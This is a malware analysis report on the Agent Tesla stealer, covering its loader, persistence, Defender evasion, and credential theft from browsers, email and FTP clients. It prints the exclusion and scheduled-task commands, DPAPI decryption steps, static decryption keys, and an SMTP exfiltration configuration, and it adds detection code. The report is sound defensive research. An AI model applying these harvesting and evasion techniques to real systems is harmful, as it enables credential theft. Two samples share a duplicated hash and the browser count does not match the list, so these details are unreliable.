Unfolding Agent Tesla: The Art of Credentials Harvesting

Agent Tesla is a sophisticated malware that infiltrates systems via phishing emails, aiming to steal sensitive information like passwords from various applications. It employs a multi-stage process involving multiple droppers and uses compromised email servers to exfiltrate the stolen data. The report details Agent Tesla's tactics, techniques, and its methods for credential harvesting across different platforms.


ABSTRACT

Agent Tesla, a sophisticated malware, infiltrates systems through phishing emails. It consists of a multi-stage process with various droppers; its primary goal is to extract sensitive information, especially passwords from web browsers, email, VPN, and FTP clients. The stolen data is emailed to the attacker's email through compromised servers. This report offers insights into Agent Tesla's tactics, techniques and sub-techniques.

Osama Ellahi
Threat Researcher
linkedin.com/in/osamaellahi/

Unfolding Agent Tesla: The Art of Credentials Harvesting
Analysis of Agent Tesla, A Close Look at Password Theft Technique
Contents
Unfolding Agent Tesla: The Art of Credentials Harvesting ..... 0
Analysis of Agent Tesla, A Close Look at Password Theft Technique ..... 0
Executive Summary ..... 2
Malware Flow ..... 3
Malware Composition ..... 4
Loader ..... 4
  Persistence ..... 7
  Defense Evasion ..... 8
  Injection ..... 10
Final Stage ..... 11
  Browsers Stealing ..... 18
  Chrome Credentials Stealing ..... 20
  Chromium-based Browser Stealing Process ..... 31
  Mozilla-based Browser Stealing Process ..... 32
  System Recon collection ..... 32
  Exfiltration ..... 33
  FileZilla ..... 35
  The BAT! EMAIL CLIENT ..... 37
  Outlook ..... 40
  Trillian ..... 42
  Discord ..... 45
  MailBird ..... 46
  WinSCP ..... 49
  Core FTP LE ..... 50
  FLASH FXP ..... 53
  FTP Navigator ..... 55
  FTP Commander ..... 56
  FTP Getter ..... 59
Executive Summary
Agent Tesla is a sophisticated piece of malware that typically infiltrates systems through deceptive emails.
Once executed, it goes through multiple stages, using various droppers to disguise its presence. The
malware's primary goal is to steal sensitive information, such as passwords, from web browsers, email,
VPN and FTP clients. It then secretly transmits this stolen data to the attacker's email through a
compromised email server.

This highlights the importance of being cautious with email attachments, to avoid falling victim to such
malicious activity.
Malware Flow
Agent Tesla starts its malicious journey through a phishing email. The initial carrier is an {EXE} file, known
as the dropper. Inside this executable file, there is a second stage {DLL} that gets loaded into its modules.
Subsequently, a third stage {DLL} is loaded, followed by a fourth stage {DLL}. This fourth {DLL} is crucial,
as it contains the actual Agent Tesla binary, which is also an {EXE} file.

Upon execution, this fourth-stage binary extracts the Agent Tesla payload, decrypts it, and injects the
Agent Tesla binary into its own running process. In simpler terms, it activates the malicious code within
itself. The final stage binary is responsible for harvesting credentials from various sources, including
browsers, email clients, VPN clients, and FTP clients.

Once it successfully collects passwords from the system, the malware takes the next step by sending this
stolen data to the attacker's email address. To achieve this, it utilizes a compromised email server,
completing the malicious cycle initiated by the phishing email.
Malware Composition

First stage (exe)
SHA256: 2877f7995c2735d9f3776a49b6b28f9af850446b023821833c94581ce2b689c4
SHA1: 1d3e3bb92c0350076148ba6fc3573335aaf03a9c
MD5: 431c41bf81aabdb9577e61c7bde667ef

Ben (dll)
SHA256: bc419893a2948f85aa53af290eca67dc626ab1467b72a45419385d0fe709fd58
SHA1: ffdd62b71859332e9cc44fb673c40cf361029964
MD5: febba18c6714fcec16d3b1961ae8e54c

ReactionDiffusion (dll)
SHA256: d01f3dea3851602ba5a0586c60430d286adf6fcc7e17aab080601a66630606e5
SHA1: cf6924eb360c7e5a117323bebcb6ee02d2aec86d
MD5: 579197d4f760148a9482d1ebde113259

Tyrone (dll)
SHA256: 8b76c98384c6c3adc45bccab7569d9c9683c322c20934b03cda24c84b76fb70d
SHA1: d9480b6ad651a8b777a91f7dcf31652de1e03894
MD5: 88d10653202e2cfcd3e972537f3911ce

Final stage {agent tesla} (exe)
SHA256: bc419893a2948f85aa53af290eca67dc626ab1467b72a45419385d0fe709fd58
SHA1: 2eba02407a65333a3675b0bafda8ddd3f2f7fc99
MD5: 7911215edc491695bf598dbff6f1d0c1

Loader
Agent Tesla in this variant comes in a very well-known loader written in C#. This loader has been
seen with many other malware families, such as FormBook, Remcos and njRAT. It is a Windows Forms
application, and the malicious code lives inside InitializeComponent().

It starts by initializing a string with obfuscated binary content.


It de-obfuscates the content by replacing "|" with "00". Then it loads an assembly named Ben into its
modules. Ben is the same obfuscated binary held in the string JFDJ; after de-obfuscation it is loaded as a
module for further processing.

After that it loads a second DLL, ReactionDiffusion, into its modules, extracting it from the resources.

Then the third DLL, named "Tyrone", is loaded into the modules. It invokes the "lNeFsQJBtN()" method
from "xmUvG0atRoqU5DT6Sy.mCFjRgCR32aHEMMYFO".
It checks whether the file "C:\Users\%username%\AppData\Roaming\kzsAJcIeUIa.exe" exists; if it does
not, it copies itself there. It does this for persistence purposes.

It changes the permissions of the copied file so that nobody can modify or delete it.
The difference is clear in the following picture: the left side was recorded before this function
executed and the right side after. Afterwards the user can no longer delete or write anything to
the file.

Then it loads the encoded string from the modules of the Tyrone binary and decodes it. The decoded
string looks like XML; let's explore it further.

Persistence
This variant of Agent Tesla achieves persistence through the Task Scheduler: it runs a
PowerShell command that takes a temporary XML file containing the task configuration.
It performs the following steps:
• loads the strings from modules;
• creates a new process;
• assigns those strings to the new process as arguments;
• sets the process window style to hidden;
• starts the process.

Defense Evasion

It adds an exclusion for a specific file (in this case kzsAJcIeUIa.exe, located in the user's
AppData\Roaming directory) to Windows Defender's scanning. This command tells Windows
Defender not to scan this file or treat it as a potential threat.

Powershell.exe
@"Add-MpPreference -ExclusionPath ""C:\Users\%username%\AppData\Roaming\kzsAJcIeUIa.exe"""

After that it alters the XML information and saves it in the Temp folder:


@"C:\Users\%username%\AppData\Local\Temp\tmp95EB.tmp"

This XML contains the configuration of the persistence task. It is triggered on every logon of the user:
when the user starts the system, it executes the application saved in Roaming.
The next command uses the Windows Task Scheduler tool, schtasks.exe, to create a scheduled task
named "kzsAJcIeUIa" inside the "Updates" folder. The task's properties and settings are defined in the
XML file at "C:\Users\%username%\AppData\Local\Temp\tmp95EB.tmp", with %username%
standing for the currently logged-in user's name.

"schtasks.exe"
@"/Create /TN ""Updates\kzsAJcIeUIa"" /XML ""C:\Users\%username%\AppData\Local\Temp\tmp95EB.tmp"""

It sets the process window style to hidden so the command runs in the background and the user sees
no command window pop up.
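The two command lines above (the Add-MpPreference exclusion and the schtasks /Create /XML task) are what a defender can alert on. The following is an added example, not code from the report, that runs simple detection logic over constructed process-creation events; the pid|image|command-line layout, the user name alice and the benign counterparts are assumptions, while the malicious lines mirror the report's commands:

```python
import re
from collections import namedtuple
from pathlib import PureWindowsPath

Event = namedtuple("Event", "pid image cmdline")
Finding = namedtuple("Finding", "rule pid detail")

# Constructed process-creation events (pid|image|command line). The first two
# mirror the report's commands after the C# "" escaping is resolved; the last
# two are benign counterparts under Program Files.
SAMPLE_LOG = [
    r"1001|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    r'Add-MpPreference -ExclusionPath "C:\Users\alice\AppData\Roaming\kzsAJcIeUIa.exe"',
    r"1002|C:\Windows\System32\schtasks.exe|"
    r'/Create /TN "Updates\kzsAJcIeUIa" /XML "C:\Users\alice\AppData\Local\Temp\tmp95EB.tmp"',
    r"1003|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    r'Add-MpPreference -ExclusionPath "C:\Program Files\BuildTools"',
    r"1004|C:\Windows\System32\schtasks.exe|"
    r'/Create /TN "Vendor\Updater" /XML "C:\Program Files\Vendor\updater.xml"',
]

# Locations a standard user can write to. A Defender exclusion or a task
# definition pointing here is far more suspicious than one under Program Files.
USER_WRITABLE = re.compile(r"^[A-Z]:\\Users\\[^\\]+\\AppData\\", re.IGNORECASE)

# Add-MpPreference ... -ExclusionPath <path>; the path is quoted or a single token.
EXCLUSION_RE = re.compile(
    r'Add-MpPreference\b.*?-ExclusionPath\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)
# schtasks /Create /TN <name> /XML <file>, the shape used by the loader.
SCHTASKS_RE = re.compile(
    r'/Create\b.*?/TN\s+(?:"([^"]+)"|(\S+)).*?/XML\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)


def _first(*groups):
    """Return whichever alternative of a quoted/unquoted capture matched."""
    return next(g for g in groups if g is not None)


def parse_event(line):
    pid, image, cmdline = line.split("|", 2)
    return Event(pid, image, cmdline)


def detect(lines):
    """Flag user-writable Defender exclusions and task definitions, then correlate
    an exclusion and a task that share a base name (kzsAJcIeUIa in the report)."""
    findings, exclusions, tasks = [], {}, {}
    for line in lines:
        ev = parse_event(line)
        image = PureWindowsPath(ev.image).name.lower()
        if image == "powershell.exe":
            m = EXCLUSION_RE.search(ev.cmdline)
            if m:
                path = _first(*m.groups())
                if USER_WRITABLE.search(path):
                    findings.append(Finding("defender_exclusion_user_writable", ev.pid, path))
                    exclusions[PureWindowsPath(path).stem.lower()] = ev.pid
        elif image == "schtasks.exe":
            m = SCHTASKS_RE.search(ev.cmdline)
            if m:
                task = _first(m.group(1), m.group(2))
                xml = _first(m.group(3), m.group(4))
                if USER_WRITABLE.search(xml):
                    findings.append(Finding("schtasks_xml_from_user_writable", ev.pid,
                                            f"{task} <- {xml}"))
                    tasks[PureWindowsPath(task).name.lower()] = ev.pid
    # Correlation: the excluded executable and the task leaf name are identical.
    for stem, pid in exclusions.items():
        if stem in tasks:
            findings.append(Finding("exclusion_and_task_share_name", f"{pid},{tasks[stem]}", stem))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"{f.rule:34} pid={f.pid:10} {f.detail}")
```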
Injection

It allocates read/write/execute memory and then writes the entire newly extracted binary from the
resources into it.

After that it injects the final-stage malware into the same process. This is process hollowing, because a
whole binary is injected into the same process.
Final Stage
The final stage is also developed in .NET (C#) and is also obfuscated. I tried de4dot, but the final
stage remained obfuscated, so I continued with debugging.
In the following figure you can see that all the names are obfuscated.

At first, the xNLwYiY function, a C# method, attempts to terminate all processes with the same
name as the current process, excluding itself.
It gets all process IDs and compares them with the current process ID; any same-named process whose
ID is not the current one is terminated. It does this so that, if an instance is already running, it is
closed and the duplication removed.
It then creates an instance of MD5.

The MD5.Create() method, in the System.Security.Cryptography namespace, creates an
instance of the MD5 hash algorithm.

The pFLA method attempts to retrieve the serial number of the baseboard using Windows Management
Instrumentation (WMI) and returns it; if an exception occurs during retrieval, it returns the
hardcoded default value "52b0e816-0a2b-41d9-a0e3-257276619f61".
The 9KASXql5F method retrieves the processor ID (in my case "0FXBFBFFXX090672") using WMI from the
"win32_processor" class and returns it; if an exception occurs during retrieval, it returns a hardcoded
default value.
The "array" contains the hash value of the UTF-8 encoded string "hk1TqC".
After this it stores the paths of 39 browsers and 34 endpoint clients in a list.
It starts adding these password file paths. I explain only one path here, that of the Opera browser; I will
explain the others when needed.
@"C:\Users\user\AppData\Roaming\Opera Software\Opera Stable" is typically used by the Opera
web browser to store various user-specific data and settings. Here are some of the things that are
commonly stored in this directory:
• User Profile Data: Opera stores user profiles, which include bookmarks, browsing
history, saved passwords, and other browser settings in this directory. These profiles are
stored in subdirectories like "Profile" or "Profile X," where "X" represents a numerical
identifier for different profiles.
• Extensions: If you have installed extensions or add-ons in Opera, their data and settings
are typically stored in this directory.
• Cookies: Browser cookies, which are used to store website login information and
preferences, are stored in this directory.
• Cache Files: Opera stores cached web content, such as images and web pages, in this
directory to improve browsing performance.
• Session Data: Information about open tabs and sessions may also be stored in this
location, allowing Opera to restore your previous browsing session when you reopen
the browser.
• Preferences and Configuration Files: Various configuration files and settings related to
the Opera browser itself are stored in this directory.
• History: Browsing history information is stored in files within this directory.

Browsers

1. "Iridium Browser"
2. "Sleipnir 6"
3. "Postbox"
4. "IceDragon"
5. "Citrio"
6. "SeaMonkey"
7. "Edge Chromium"
8. "Amigo"
9. "CyberFox"
10. "Firefox"
11. "CentBrowser"
12. "Kometa"
13. "Orbitum"
14. "Thunderbird"
15. "Coowon"
16. "Flock"
17. "K-Meleon"
18. "Brave"
19. "Torch Browser"
20. "Chrome"
21. "Elements Browser"
22. "Sputnik"
23. "Uran"
24. "IceCat"
25. "Coccoc"
26. "Chedot"
27. "Comodo Dragon"
28. "WaterFox"
29. "QIP Surf"
30. "360 Browser"
31. "Opera Browser"
32. "Chromium"
33. "Vivaldi"
34. "Cool Novo"
35. "BlackHawk"
36. "Yandex Browser"
37. "PaleMoon"
38. "7Star"
39. "Liebao Browser"
40. "Epic Privacy"

Endpoint Clients

1. "IE/Edge"
2. "UC Browser"
3. "Safari for Windows"
4. "Flock Browser"
5. "Outlook"
6. "Windows Mail App"
7. "The Bat!"
8. "Becky!"
9. "IncrediMail"
10. "Eudora"
11. "ClawsMail"
12. "FoxMail"
13. "Opera Mail"
14. "PocoMail"
15. "eM Client"
16. "Mailbird"
17. "FileZilla"
18. "WinSCP"
19. "CoreFTP"
20. "Flash FXP"
21. "FTP Navigator"
22. "SmartFTP"
23. "WS_FTP"
24. "FtpCommander"
25. "FTPGetter"
26. "OpenVPN"
27. "NordVPN"
28. "Private Internet Access"
29. "Discord"
30. "Trillian"
31. "Psi/Psi+"
32. "MysqlWorkbench"
33. "Internet Downloader Manager"
34. "JDownloader 2.0"
The function asIKdaFU handles all the credential dumping and password decryption, and the
exfiltration code is also in this method.

These are some of the endpoint clients, as you can see in the figures. It loops through every one of
them and steals passwords from all of them.
Let's start with one; let's look at a famous browser like Chrome and see how Agent Tesla steals Chrome
passwords.
It loops through all the browsers and calls qDYTpM from the F0hZpzhM class, passing
@"C:\Users\%username%\AppData\Local\Google\Chrome\User Data", "Chrome" and true as
arguments. This is the method that handles password decryption and stealing for almost 27 browsers.
Agent Tesla hands the User Data folder of every Chromium-based browser to this method and in return
gets all the passwords after decryption.

Browsers Stealing
Agent Tesla has two ways of stealing browser passwords. I have categorized them as type A, the
Chromium-based browsers, and type B, the Mozilla-based browsers.

Stealing from all type A browsers works almost the same way: it checks the paths, and if the browser is
installed it starts credential harvesting. All type B browsers likewise share one method. So in total there
are two major functions used for browser stealing; the code just sends them the paths and gets the
credentials back if the browser is installed.

Type A

1. @"C:\Users\%username%\AppData\Roaming\Opera Software\Opera Stable"
2. @"C:\Users\%username%\AppData\Local\Yandex\YandexBrowser\User Data"
3. @"C:\Users\%username%\AppData\Local\Iridium\User Data"
4. @"C:\Users\%username%\AppData\Local\Chromium\User Data"
5. @"C:\Users\%username%\AppData\Local\7Star\7Star\User Data"
6. @"C:\Users\%username%\AppData\Local\Torch\User Data"
7. @"C:\Users\%username%\AppData\Local\MapleStudio\ChromePlus\User Data"
8. @"C:\Users\%username%\AppData\Local\Kometa\User Data"
9. @"C:\Users\%username%\AppData\Local\Amigo\User Data"
10. @"C:\Users\%username%\AppData\Local\BraveSoftware\Brave-Browser\User Data"
11. @"C:\Users\%username%\AppData\Local\CentBrowser\User Data"
12. @"C:\Users\%username%\AppData\Local\Chedot\User Data"
13. @"C:\Users\%username%\AppData\Local\Orbitum\User Data"
14. @"C:\Users\%username%\AppData\Local\Sputnik\Sputnik\User Data"
15. @"C:\Users\%username%\AppData\Local\Comodo\Dragon\User Data"
16. @"C:\Users\%username%\AppData\Local\Vivaldi\User Data"
17. @"C:\Users\%username%\AppData\Local\CatalinaGroup\Citrio\User Data"
18. @"C:\Users\%username%\AppData\Local\360Chrome\Chrome\User Data"
19. @"C:\Users\%username%\AppData\Local\uCozMedia\Uran\User Data"
20. @"C:\Users\%username%\AppData\Local\liebao\User Data"
21. @"C:\Users\%username%\AppData\Local\Elements Browser\User Data"
22. @"C:\Users\%username%\AppData\Local\Epic Privacy Browser\User Data"
23. @"C:\Users\%username%\AppData\Local\CocCoc\Browser\User Data"
24. @"C:\Users\%username%\AppData\Local\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer"
25. @"C:\Users\%username%\AppData\Local\QIP Surf\User Data"
26. @"C:\Users\%username%\AppData\Local\Coowon\Coowon\User Data"
27. @"C:\Users\%username%\AppData\Local\Google\Chrome\User Data"

Type B

1. @"C:\Users\%username%\AppData\Roaming\Mozilla\Firefox\"
2. @"C:\Users\%username%\AppData\Roaming\Mozilla\SeaMonkey\"
3. @"C:\Users\%username%\AppData\Roaming\Thunderbird\"
4. @"C:\Users\%username%\AppData\Roaming\NETGATE Technologies\BlackHawk\"
5. @"C:\Users\%username%\AppData\Roaming\8pecxstudios\Cyberfox\"
6. @"C:\Users\%username%\AppData\Roaming\K-Meleon\"
7. @"C:\Users\%username%\AppData\Roaming\Mozilla\icecat\"
8. @"C:\Users\%username%\AppData\Roaming\Moonchild Productions\Pale Moon\"
9. @"C:\Users\%username%\AppData\Roaming\Comodo\IceDragon\"
10. @"C:\Users\%username%\AppData\Roaming\Waterfox\"
11. @"C:\Users\%username%\AppData\Roaming\Postbox\"
12. @"C:\Users\%username%\AppData\Roaming\Flock\Browser\"

Chrome Credentials Stealing


To make our environment ready, let's save two passwords in the Chrome browser for testing.

First it initializes the path to the Login Data file of the Chrome browser.
Note: Chromium-based browsers store all their credentials in the Login Data file, which is a SQLite file.
But the passwords in it are encrypted, so no exploit can simply read them out.

@"C:\Users\%username%\AppData\Local\Google\Chrome\User Data\Login Data":


o This path points to the "Login Data" file in the "User Data" folder of your
Chrome profile.
o The "User Data" folder is where Chrome stores various user-specific data,
including bookmarks, history, passwords, and other settings.
o The absence of the "Default" subfolder in this path suggests that it may be
associated with a non-default Chrome profile.
@"C:\Users\%username%\AppData\Local\Google\Chrome\User Data\Default\Login Data":
o This path points to the "Login Data" file in the "Default" subfolder of the "User
Data" folder.
o The "Default" subfolder is typically the main profile folder for Google Chrome. It
contains the user's primary browsing data.
It checks these paths to determine whether the browser is installed on the system.

If the directory exists it goes further with enumeration. It gets all the subfolders of the directory to
look for the password database file.

Passwords are stored in the Login Data file; this file has no extension like ".db" or ".sql". It is a SQLite
file, but all Chromium-based browsers save it simply as "Login Data".
Then it reads the Login Data file. Login data means a unique combination of the user's name and a
password chosen by the user, stored by the user in the application's database when the user's
account is created through the application, and/or the user's password automatically generated by
the application.

Login Data is a SQLite file, so Agent Tesla fetches all the tables from it.
It targets three things: hostname, username and password.

It fetches the origin, username and password.

After getting the plain origin, username and encrypted password, it has two checks: Opera is handled in
a slightly different way, and the rest of the browsers use the typical way. Since we are testing on Chrome,
we will continue with the non-Opera path.

After getting the encrypted password, Agent Tesla then requires a key to decrypt it. All
Chromium-based browsers save the key protecting their encrypted passwords in the \Local State file.
Agent Tesla applies a regular expression to fetch the key. Local State is a JSON file, so we only need the
value of "encrypted_key".
Let's explore the Local State file and see Agent Tesla's regex on encrypted_key.

Agent Tesla fetches the encrypted_key successfully from Local State after the regex, as you can see in
the value. It then first decodes it from base64.

The expression array.Length - 6 + 1 sets the length of array3 so that the first 6 elements of the original
array are excluded, creating a new array that starts from the 7th element. In simple words, it removes
the "DPAPI" marker from the start and hands the rest to ProtectedData.Unprotect, which uses the
current user's DPAPI to decrypt the encrypted_key.

Typical use cases for ProtectedData.Unprotect include:


• Storing and protecting sensitive information like passwords or private keys in
application settings or configuration files.
• Safeguarding user-specific data, such as browser cookies, saved passwords, or tokens.
• Securing data that needs to be stored on disk or transmitted over a network in an
encrypted form.

After the encrypted_key is decrypted, this key is used with DPAPI to decrypt the encrypted password.
The plain password is then obtained as a byte array and returned; the main code converts the byte
array to a string and gets the plaintext password.
Then it appends these four details to the list.
After running a full scan and enumeration of browsers, it had these 5 passwords from my test
environment.

Chromium-based Browser Stealing Process

Let's collect our thoughts and list the main steps. Agent Tesla:
1. Reads the origin, username and encrypted password from the Login Data file of the
Chromium-based browser, which is a SQLite file.
2. Reads encrypted_key from the Local State file in the User Data folder, which is a JSON file,
using the regex.
3. Decodes the encrypted_key from base64, removes the "DPAPI" keyword from the start
and decrypts this key using the Windows DPAPI of the current user.
4. The decrypted key is then used with DPAPI to decrypt the encrypted
password.
Mozilla-based Browser Stealing Process

1. The code retrieves encrypted usernames and passwords from Firefox's "logins.json" file, which is
the definitive source of login-related data.
2. To decrypt the stored passwords, the code relies on the Network Security Services (NSS) library,
and it specifically utilizes the PK11SDR_Decrypt function from the "nss3.dll" library.
3. NSS is a comprehensive library designed to handle secure cryptographic operations, and the
specifics of the encryption algorithm are managed internally by NSS for the sake of security and
reliability.
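For both the Chromium-based stores (Login Data, Local State) and the Mozilla-based store (logins.json) described above, the detectable behaviour is a process other than the owning browser reading these files, and a single process sweeping several browser families in a row. The following added example (not the report's code) applies that logic to constructed file-access events; the event layout, the user name alice and the legitimate reader image names are assumptions, while the profile directories come from the report's Type A / Type B lists:

```python
from collections import defaultdict, namedtuple
from pathlib import PureWindowsPath

FileEvent = namedtuple("FileEvent", "pid image target")
Finding = namedtuple("Finding", "rule pid detail")

# File names the report identifies as credential stores (matched case-insensitively).
CREDENTIAL_STORES = {"login data", "local state", "logins.json"}

# (profile directory fragment from the report's lists, family label, images that
# legitimately read it). The image names are assumptions for this example.
OWNERS = [
    (r"\Google\Chrome\User Data", "chrome", {"chrome.exe"}),
    (r"\BraveSoftware\Brave-Browser\User Data", "brave", {"brave.exe"}),
    (r"\Opera Software\Opera Stable", "opera", {"opera.exe"}),
    (r"\Mozilla\Firefox", "firefox", {"firefox.exe"}),
    (r"\Thunderbird", "thunderbird", {"thunderbird.exe"}),
]

# Constructed file-access events (pid|image|target). The browsers reading their
# own stores are benign; pid 5300 is the copied loader name from the report
# touching three browser families, as the harvesting loop would.
SAMPLE_EVENTS = [
    r"4100|C:\Program Files\Google\Chrome\Application\chrome.exe|C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"4200|C:\Program Files\Mozilla Firefox\firefox.exe|C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\ab12cd34.default-release\logins.json",
    r"5300|C:\Users\alice\AppData\Roaming\kzsAJcIeUIa.exe|C:\Users\alice\AppData\Local\Google\Chrome\User Data\Local State",
    r"5300|C:\Users\alice\AppData\Roaming\kzsAJcIeUIa.exe|C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"5300|C:\Users\alice\AppData\Roaming\kzsAJcIeUIa.exe|C:\Users\alice\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login Data",
    r"5300|C:\Users\alice\AppData\Roaming\kzsAJcIeUIa.exe|C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\ab12cd34.default-release\logins.json",
    r"6400|C:\Windows\explorer.exe|C:\Users\alice\Documents\notes.txt",
]


def classify(target):
    """Return (family, owner_images) when target is a known credential store under a
    known profile directory, otherwise None. Works with or without the Default
    profile subfolder, since only the file name and directory fragment are checked."""
    if PureWindowsPath(target).name.lower() not in CREDENTIAL_STORES:
        return None
    low = target.lower()
    for fragment, family, owners in OWNERS:
        if fragment.lower() in low:
            return family, owners
    return None


def parse_event(line):
    pid, image, target = line.split("|", 2)
    return FileEvent(pid, image, target)


def detect(lines, sweep_threshold=2):
    """One finding per unexpected reader of a credential store, plus a sweep finding
    when the same pid reaches at least sweep_threshold distinct browser families."""
    findings = []
    families_by_pid = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        hit = classify(ev.target)
        if hit is None:
            continue
        family, owners = hit
        reader = PureWindowsPath(ev.image).name.lower()
        if reader in owners:
            continue  # the browser reading its own profile is expected
        findings.append(Finding("unexpected_credential_store_reader", ev.pid,
                                f"{reader} -> {ev.target}"))
        families_by_pid[ev.pid].add(family)
    for pid, families in families_by_pid.items():
        if len(families) >= sweep_threshold:
            findings.append(Finding("multi_browser_credential_sweep", pid,
                                    ",".join(sorted(families))))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.rule:34} pid={f.pid} {f.detail}")
```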

System Recon collection

Then it adds all the enumerated items to the list and gets them ready for exfiltration.

It fetches the following details from the system using "vVwoRiXJKOu", and from rsrz("PW") it fetches
"PW_Username_Desktopname"; it then merges the passwords with this information.
• Time
• User Name
• Computer Name
• OSFullName
• CPU
• RAM

"Time: 01/03/2024 05:41:35<br>User Name: %username%<br>Computer Name: DESKTOP-002IHON<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: 12th Gen Intel(R) Core(TM) i7-12700KF<br>RAM: 8191.05 MB<br> <hr>Host: https://host.com/<br>Username: username<br>Password: pass<br>Application: Chrome<br><hr>Host: https://test.com/<br>Username: usernameoftest<br>Password: hyhello<br>Application: Chrome<br><hr>Host: https://outlook.com/<br>Username: user<br>Password: pass<br>Application: Edge Chromium<br><hr>Host: https://host.com/<br>Username: username<br>Password: pass<br>Application: Edge Chromium<br><hr>Host: https://test.com/<br>Username: usernameoftest<br>Password: hyhello<br>Application: Edge Chromium<br><hr>"

Exfiltration
Then it prepares the mail object for sending the data to the attacker's email; the attacker's address is
hardcoded in it as {[email protected]}.

Then it sets the sending email address, picked from a hardcoded variable.

Then it sets the subject to the system identifier, which is PW_username/desktopname.

Then it sets the HTML body to the data containing the system information and the harvested passwords.

Then it initializes an SmtpClient, configures the client options and sends the email to the attacker's
address:

smtpClient.Host : "mail.elec-qatar.com"
smtpClient.Credentials.Domain : ""
smtpClient.Credentials.Password : *************
smtpClient.Credentials.UserName : [email protected]
smtpClient.Port : 0x0000024B (587)
smtpClient.UseDefaultCredentials : false
smtpClient.EnableSsl : false
smtpClient.Server : mail.elec-qatar.com
After sending the email it disposes of the attachment to free memory and clear the loot from the system.

Then it checks the flags for the keylogger and the screen keylogger. There is a full keylogger implementation
coded in it, but since the flag was not set in this variant I will not patch and analyze it, or maybe I will if you
request me to ;)

FileZilla

Let's set up client accounts to see how it steals client application data.
Let's test FileZilla; I used a dummy account that does not exist, just for testing purposes.

Agent Tesla starts its search in the appdata\Roaming\FileZilla\recentserver.xml file. On manual
inspection of this file, all credentials were found stored without encryption. The lack of encryption
suggests that stealing these credentials is straightforward.
The malware searches the XML file for the pattern "<Pass encoding="base64">" ... "</Pass>". On
finding this pattern, it reads the enclosed value and base64-decodes it to obtain the plaintext password.
It then advances to the next set of credentials if FileZilla has stored any more.
The BAT! EMAIL CLIENT

The BAT! is a versatile and highly customizable email client for Windows that offers a wide range of
advanced features. Known for its robust security options, it supports encryption methods like PGP,
S/MIME, and TLS/SSL, ensuring email privacy. With powerful filtering and sorting capabilities, integrated
calendar and task list, multi-account support, and anti-phishing protection, The BAT! provides efficient
email management and enhanced productivity. Its user-friendly interface, RSS reader, and backup
options make it a reliable choice for individuals and businesses alike, offering comprehensive email
solutions while allowing users to tailor the client to their specific needs.

For testing I logged in to a test Outlook account to observe the malware's behavior.

It loops through all the directories under appdata/The Bat and searches for Account.CFN; then it
reads all lines into an array and searches each line for "zzz" to decide what to do.

The wrMbNDi function in C# appears to be a custom decoding routine. It processes a given input string
(RfAY), ensuring its length is a multiple of four. The function iterates over this string, using a predefined
character set (text) as a lookup table. It then performs bitwise operations to turn groups of characters
into byte values, which are stored in an array. This array is further processed by an external method
(uOdpEZr6.LmAzRa). Finally, the function constructs and returns a new string by XORing the processed
bytes with the number 90 and converting them to characters.
In the end it was not able to fetch credentials, because The Bat! has updated its password storage,
presumably since I performed the test on the latest The Bat! client.
It was only able to fetch the SMTP server and the email address.

Our next target is IncrediMail: how Agent Tesla steals IncrediMail credentials.
Debugging the code shows that IncrediMail stores its credentials in the registry at
{Computer\HKEY_CURRENT_USER\SOFTWARE\IncrediMail\Identities\{606C1F46-9FD0-483F-A6E6-A7688EFCFC58}\Accounts_New\{29CAE6CD-D275-45C7-8EF6-E3265CD0D2B2}};
every IncrediMail installation will have different identities.
There is only a POP password, which was not clear text, so let's see how it fetches the password.
First it checks whether poppassword or smtppassword exists in the registry; if so, it fetches the value
and processes it.
array2 = new byte[] { 185, 2, 250, 1 };
This array2 is the static key IncrediMail uses to encrypt its passwords.

The C# method exE performs bitwise XOR between the elements of two byte arrays, array2 and
popPassword, and stores the results in a new byte array named array. It was complex to follow, so I
patched it and rewrote the code with clean XOR logic.

At the end we have these credentials.


Outlook

For Outlook it first searches these registry paths:

• Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles
• Software\\Microsoft\\Office\\12.0\\Outlook\\Profiles
• Software\\Microsoft\\Office\\14.0\\Outlook\\Profiles
• Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles
• Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles
• Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676
• Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles

Outlook usually saves its credentials in these paths, but the passwords are encrypted.

So the exploit first loops through all the nested paths and searches for an Email or Password key; it then
checks whether the IMAP, POP3, HTTP or SMTP entries hold a value and retrieves it.
The zN5gmIdWTqM method processes the passwords: it calls the hmUn method of the Program class to decrypt
the byte array and returns the processed string. The hmUn method decrypts the byte array using the Data
Protection API (DPAPI) and converts the result to a UTF-8 string, which it returns.

It loops through all the paths and collects the credentials. After this it adds the credentials to the list
and moves on to the next client.
Trillian
Trillian is easy-to-use, HIPAA-compliant instant messaging for people, business, and healthcare. Send
messages, share files, and much more!

First it checks for the accounts.dat file, which is stored encrypted at

appdata\Roaming\Trillian\Users\global\accounts.dat.

Secondly, it decrypts all the file data with the DPAPI of the current user. This time the full file is decrypted
using DPAPI, whereas the other clients use DPAPI on the passwords only.
But there is still another layer of password protection. The password looks Base64-encoded; let's see how
Agent Tesla processes it into clear text.

It saves all the data in an array and loops through the array to arrange all the credentials.
Trillian uses this key to decrypt the password.
byte[] array2 = new byte[]
{
243, 38, 129, 196, 57, 134, 219, 146, 113, 163,
185, 230, 83, 122, 149, 124, 0, 0, 0, 0,
0, 0, byte.MaxValue, 0, 0, 128, 0, 0, 0, 128,
128, 0, byte.MaxValue, 0, 0, 0, 128, 0, 128, 0,
128, 128, 0, 0, 0, 128, byte.MaxValue, 0, 128, 0,
byte.MaxValue, 0, 128, 128, 128, 0, 85, 110, 97, 98,
